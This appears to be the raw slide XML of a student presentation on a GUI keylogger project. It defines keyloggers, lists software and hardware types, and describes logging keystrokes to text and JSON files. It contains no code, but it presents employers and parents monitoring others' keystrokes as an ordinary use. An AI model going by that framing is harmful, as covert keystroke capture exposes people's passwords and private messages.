                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75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8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8382001" cy="8208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sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>This Project provides a basic keylogger with a simple GUI for user interaction. It effectively captures and logs keyboard events to both a text file and a JSON file, making it suitable for simple monitoring purposes. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000"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457200" y="2553874"/>
            <a:ext cx="4411894" cy="2542472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5374847" y="2553873"/>
            <a:ext cx="3683428" cy="2542473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="5591175"/>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rgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>JSON FILE</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6400800" y="5591175"/>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rgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEXT FILE</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PROJECT LINK:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990601" y="2209800"/>
            <a:ext cx="5638800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/UDAYKIRAN1112/cybersecurity.git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134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051425" cy="293670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="5" dirty="0"/>
              <a:t>PROJECT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="25" dirty="0"/>
              <a:t>TITLE</a:t>
            </a:r>
            <a:endParaRPr sz="1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8" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354064" y="2255060"/>
            <a:ext cx="7225831" cy="255454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b="1" dirty="0">
                <a:ln w="6600">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Keylogger And</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" dirty="0">
                <a:ln w="6600">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>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152400" y="447674"/>
            <a:ext cx="2944495" cy="629018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>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32" name="Diagram 31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2032000" y="1066800"/>
          <a:ext cx="6965674" cy="5071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scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="soft" dir="t">
                <a:rot lat="0" lon="0" rev="15600000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d extrusionH="57150" prstMaterial="softEdge">
              <a:bevelT w="25400" h="38100"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>What is Keylogger and Security?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1905000"/>
            <a:ext cx="76200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Keylogger, short for keystroke logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" baseline="-25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is a type of surveillance technology used to monitor and record each keystroke typed on a computer keyboard. Keylogger can be either software-based or hardware-based and are often used for a variety of purposes, both legitimate and malicious.</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rot="10800000" flipV="1">
            <a:off x="914400" y="3886200"/>
            <a:ext cx="76200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Keylogger Security refers to the practices and measures taken to protect against the malicious use of keyloggers. Keyloggers can pose significant Security risks, as they capture Keystrokes and can steal sensitive information such as passwords, credit card numbers, and personal messages. Therefore, implementing Keylogger security involves various strategies to detect, prevent, and mitigate the impact of Keyloggers.</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381000" y="1376798"/>
            <a:ext cx="3200400" cy="381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GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Keylogger and security:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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9200" y="2895600"/>
            <a:ext cx="3035157" cy="13804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304801" y="190501"/>
            <a:ext cx="8534400" cy="806054"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Types of Keyloggers:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="1143000"/>
            <a:ext cx="8305799" cy="5170646"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Software Keyloggers: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Application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are programs that run in the background and capture keystrokes, then store or transmit this data.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Kernel-based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are more sophisticated and operate at the operating system level, making them harder to detect.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API-based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hook into the system’s API to intercept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Form-grabbing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capture data submitted in web forms before it is encrypted.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r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. H</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="20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ardware Keyloggers</a:t>
            </a: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t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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External Devices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Physical devices that are plugged into the computer, often between the keyboard and the computer.</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Firmware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Embedded within the hardware, such as the BIOS or keyboard firmware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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04800" y="76200"/>
            <a:ext cx="61722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solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ROB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="55" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-370" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-375" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ME</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NT</a:t>
            </a:r>
            <a:endParaRPr sz="40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Arrow: Right 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276546" y="1208153"/>
            <a:ext cx="8791254" cy="3446307"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 92169"/>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GB" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>To Create a basic Keylogger application with Graphical User interface that allows user to start and stop keylogging, and to log keystrokes in text and both JSON formats(or) Develop a simple keylogger application with a Graphical User Interface(GUI) to start and stop keylogging. The application Should log all keystrokes  and save them in both text and Json formats.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76200"/>
            <a:ext cx="6705600"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75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PROJECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" spc="5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="40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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="object 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8457279" y="2598854"/>
            <a:ext cx="3533775" cy="3810000"/>
            <a:chOff x="8658225" y="2647950"/>
            <a:chExt cx="3533775" cy="3810000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2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22" name="object 5"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8658225" y="2647950"/>
              <a:ext cx="3533775" cy="3810000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2360917">
            <a:off x="8652998" y="449146"/>
            <a:ext cx="309563" cy="33022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7" name="object 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10851051" y="6100391"/>
            <a:ext cx="151129" cy="191770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0">
              <a:defRPr sz="1100" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="2D936B"/>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8100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="55"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="10" dirty="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr spc="10" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18" name="Diagram 17"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="200947" y="1522452"/>
          <a:ext cx="4038599"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9" name="Diagram 18"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4316013" y="1474904"/>
          <a:ext cx="4207510" cy="372173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346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272712" y="3429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192893"/>
            <a:ext cx="6934200" cy="638175"/>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lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>W</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H</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O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-2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AR</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T</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H</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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>N</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D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-4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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>U</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4000" spc="-2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R</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S?</a:t>
            </a:r>
            <a:endParaRPr sz="40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Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="838200"/>
            <a:ext cx="8991600" cy="6019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end users of this code are individuals who need to monitor and log keystrokes on a computer system. This code provides a graphical user interface (GUI) for starting and stopping a keylogger. Here are the detailed end-use interactions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-GB" dirty="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GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>General Users:</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Monitoring Activity : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>General users, such as parents or employers, might use this keylogger to monitor activity on a computer. They would be able to see which keys are being pressed, held, and released.</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2. Developers and Programmers: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Testing Purpose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Developers can use this keylogger for testing applications, ensuring that certain keystrokes are captured correctly within their software.</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3.Security Researchers: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Studying Behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
